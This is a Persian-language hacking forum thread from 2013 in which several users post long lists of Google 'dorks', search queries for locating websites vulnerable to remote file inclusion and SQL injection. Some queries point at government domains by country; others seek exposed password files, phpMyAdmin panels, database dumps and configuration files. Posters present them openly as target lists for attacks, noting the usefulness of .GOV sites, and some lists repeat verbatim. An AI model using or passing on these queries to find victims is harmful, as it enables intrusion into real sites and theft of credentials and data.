principal.php?pollname=
include.php?read=
press.php?rub=
index2.php?incl=
pagina.php?chapter=
view.php?middle=
print.php?sekce=
padrao.php?pname=
head.php?ref=
principal.php?link=
gery.php?menue=
template.php?op=
info.php?doshow=
default.php?sivu=
nota.php?pagina=
sitio.php?content=
press.php?thispage=
press.php?pa=
index1.php?redirect=
padrao.php?menue=
index2.php?sekce=
mod*.php?d=
include.php?filepath=
principal.php?l=
layout.php?oldal=
include.php?b=
layout.php?pollname=
start.php?play=
print.php?r=
info.php?*
sub*.php?*
* *=
mod*.php?addr=
base.php?category=
index2.php?d=
mod*.php?phpbb_root_path=
default.php?include=
press.php?module=
default.php?module=
info.php?pname=
path.php?id=
general.php?get=
press.php?path=
padrao.php?sekce=
base.php?ki=
file.php?cmd=
layout.php?section=
press.php?include=
mod*.php?destino=
base.php?doshow=
principal.php?load=
print.php?type=
index1.php?adresa=
index3.php?pre=
standard.php?cont=
gery.php?open=
blank.php?read=
sitio.php?redirect=
index1.php?cmd=
info.php?redirect=
file.php?load=
index3.php?itemnav=
gery.php?mod=
enter.php?ref=
down*.php?t=
view.php?goFile=
file.php?var=
sitio.php?ir=
show.php?b=
sitio.php?param=
sub*.php?rub=
print.php?opcion=
press.php?middle=
info.php?ir=
home.php?basepath=
blank.php?section=
include.php?to=
start.php?sp=
index3.php?name=
template.php?showpage=
view.php?ki=
index1.php?sekce=
press.php?option=
nota.php?home=
gery.php?my=
show.php?mid=
blank.php?o=
sitio.php?pr=
index3.php?destino=
main.php?body=
blank.php?lang=
path.php?thispage=
padrao.php?OpenPage=
info.php?pageweb=
blank.php?h=
head.php?incl=
principal.php?ref=
start.php?go=
file.php?action=
template.php?t=
base.php?mid=
start.php?b=
start.php?lang=
default.php?rub=
head.php?read=
show.php?cmd=
press.php?get=
principal.php?secc=
gery.php?menu=
gery.php?corpo=
include.php?module=
page.php?redirect=
gery.php?filepath=
general.php?ir=
file.php?ref=
index1.php?seite=
include.php?pageweb=
show.php?seccion=
mod*.php?pagina=
sub*.php?name=
padrao.php?c=
padrao.php?eval=
file.php?ev=
default.php?body=
enter.php?itemnav=
blank.php?var=
index.php?addr=
blank.php?oldal=
nota.php?url=
index2.php?action=
blank.php?phpbb_root_path=
mod*.php?var=
mod*.php?strona=
nota.php?nivel=
template.php?content=
mod*.php?content=
default.php?f=
view.php?goto=
principal.php?abre=
pagina.php?filepath=
nota.php?link=
template.php?tipo=
index3.php?q=
page.php?adresa=
sitio.php?category=
index2.php?link=
sub*.php?k=
layout.php?numero=
tools/send_reminders.php?includedir=
module_db.php?pivot_path=
inc/cmses/aedatingCMS.php?dir[inc]=
modules/vwar/admin/admin.php?vwar_root=
bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=
index.php?RP_PATH=
index.php?pagename=
smarty_config.php?root_dir=
components/com_forum/download.php?phpbb_root_path=
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=
classes/adodbt/sql.php?classes_dir=
send_reminders.php?includedir=
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=
inc/functions.inc.php?config[ppa_root_path]=
components/com_cpg/cpg.php?mosConfig_absolute_path=
admin/index.php?o=
index.php?menu=deti&page=
modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
m2f/m2f_phpbb204.php?m2f_root_path=
components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
admin/doeditconfig.php?thispath=../includes&config[path]=
components/com_simpleboard/image_upload.php?sbp=
wamp_dir/setup/yesno.phtml?no_url=
include/new-visitor.inc.php?lvc_include_dir=
support/mailling/maillist/inc/initdb.php?absolute_path=
coppercop/theme.php?THEME_DIR=
inc/header.php/step_one.php?server_inc=
inc/pipe.php?HCL_path=
include/new-visitor
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCate gory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="

MIrWeblog
10-27-2013, 09:26 PM
دیدم استقبال از این بخش خوبه :ی



good.php?id=

pal.php?id=

index.php?action=

Prison-Pen-Pal.php?r=

Prisonphp?r=

Prisonphp?id=

Prisonphp?r=

page.php?page=

ss.php?fileID=

showthread.php?t

ss.php?id=

productss.php?ProductID=

scam.php?id=

MIrWeblog
10-28-2013, 07:52 AM
اگه تشکرا رو زیاد کنین دورک های خوبی هم میزاریما:ی

درسته این دورک های پروایت نیستند ولی بهترین دورک ها هستند که تا به حال دیدم



inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php
inurl:Host:+filetype:sql
inurl:phpMyAdmin running on localhost – phpMyAdmin 2.5.7-pl1inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php
inurl:Host:+filetype:sql
inurl:phpMyAdmin running on localhost – phpMyAdmin 2.5.7-pl1

MIrWeblog
11-01-2013, 06:38 PM
سلام

دارم هاردمو تمیز میکنم:ی

هیچکس نمیتونه بگه من دارم از جاهای دیگه کپی میکنم این نامردیه :ی

مجموعه ای از بهترین دورک های rfi



inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/ashnews.php?pathtoashnews=
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_path=
inurl:/b2-tools/gm-2-b2.php?b2inc=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/includes/include_once.php?include_file=
inurl:/e107/e107_handlers/secure_img_render.php?p=
inurl:/shoutbox/expanded.php?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin.php?cal_dir=
inurl:/index.php/main.php?x
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualizar=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_loca=
inurl:/index.php?site
inurl:/htmltonuke.php?filnavn=
inurl:/livehelp/inc/pipe.php?HCL_path=
inurl:/hcl/inc/pipe.php?HCL_path=
inurl:/inc/pipe.php?HCL_path=
inurl:/support/faq/inc/pipe.php?HCL_path=
inurl:/help/faq/inc/pipe.php?HCL_path=
inurl:/helpcenter/inc/pipe.php?HCL_path=
inurl:/live-support/inc/pipe.php?HCL_path=
inurl:/gnu3/index.php?do
inurl:/gnu/index.php?doc=
inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
inurl:/forum/install.php?phpbb_root_dir=
inurl:/includes/calendar.php?phpc_root_path=
inurl:/includes/setup.php?phpc_root_path=
inurl:/inc/authform.inc.php?path_pre=
inurl:/include/authform.inc.php?path_pre=
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
allinurl:/index.php?page= site:*.dk
allinurl:/index.php?file= site:*.dk
INURL OR ALLINURL WITH
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=

MIrWeblog
11-08-2013, 10:03 PM
inurl:index.php?id= site:*gov.pl
inurl:index.php?id= site:*gov
inurl:news.php?id= site:*gov.af
inurl:oferta.php?id= site:*gov.af
inurl:trainers.php?id= site:*gov.pl
inurl:article.php?ID= site:*gov.uk
inurl:play_old.php?id= site:*gov.au
inurl:declaration_more.php?decl_id= site:*gov.in
inurl:Pageid= site:*gov
inurl:pagina.php?left= site:*.gov.au
inurl:layout.php?id=120'= site:*gov.pl
inurl:principal.php?id=123'= site:*gov.uk
inurl:standard.php?base_dir= site:*gov
inurl:home.php?where= site:*gov.pl
inurl:page.php?sivu= site:*.pl
inurl:*inc*.php?adresa= site:*gov
inurl:padrao.php?str= site:*gov
inurl:include.php?my= site:*.gov.af
inurl:show.php?home= site:*gov.br
inurl:index.php?lid=20= site:*gov.au
inurl:principal.php?id=30= site:*gov
inurl:file.php?id=205= site:*gov.au
inurl:info.php?id=25155= site:*gov.af
inurl:enter.php?id=203= site:*gov.uk
inurl:general.php?id=50= site:*gov
inurl:principal.php?id=705= site:*gov.za
inurl:standard.php?id=303= site:*.gov.ie
nurl:nota.php?v= site:*gov.bc.ca
inurl:home.php?str= site:*ed.gov
inurl:press.php?panel= site:*gov.mu
inurl:page.php?mod= site:*gov
inurl:default.php?param= site:*gov
inurl:down*.php?texto= site:*go.af
inurl:mod*.php?dir= site:*gov.ie
inurl:view.php?where= site:*gov.za
inurl:blank.php?subject= site:*gov.br
inurl:path.php?play= site:*gov.uk
inurl:base.php?l= site:*gov.au

shadow1020
12-11-2013, 06:41 PM
این تارگت ها رو از یه سایت vip آمریکایی به دست آوردم...امیدوارم به درد بخور باشه...
(از ادمین خواهش میشه به قسمت مربوطه انتقال بده)


945459454694547

shadow1020
12-11-2013, 08:38 PM
Pr!v8 Dork => Poto


inurl:"poto" intext:"powered by Shop737"
inurl:"poto" intext:"powered by Bisnis7 "
inurl:"poto" intext:"powered by StudioWeb "

SolD!3r
12-11-2013, 08:41 PM
با تغیر دادن دورک زیر میتونید از هر کشوری باگ SQL بدست بیارید:75:

فراموش نکنید .GOV هست


site:gov.* -gov.uk filetype:asp inurl:id OR inurl:admin

shadow1020
12-11-2013, 08:44 PM
خوب خودم از این دورک ها خیلی استفاده میکردم که گفتم امروز برای شما هم قرار بدم که استفاده کنید
حاوی بیش از 500 دورک 2013 هست D:


allinurl:*.php?txtCodiInfo=
inurl:read.php?=
inurl:"ViewerFrame?Mode="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
intitle:axis intitle:"video server"
inurl:indexFrame.shtml Axis
?intitle:index.of? mp3 artist-name-here
"intitle:index of"
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
intitle:"TUTOS Login"
intitle:"TWIG Login"
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

shadow1020
12-11-2013, 08:46 PM
ادامه دورک ها



inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -s?ri?t
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
allintitle:*.php?logon=*
+(”index of”) +(”/ebooks”|”/book”) +(chm|pdf|zip|rar) +apache
allinurl: +(rar|chm|zip|pdf|tgz|lit)
“parent directory ” Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
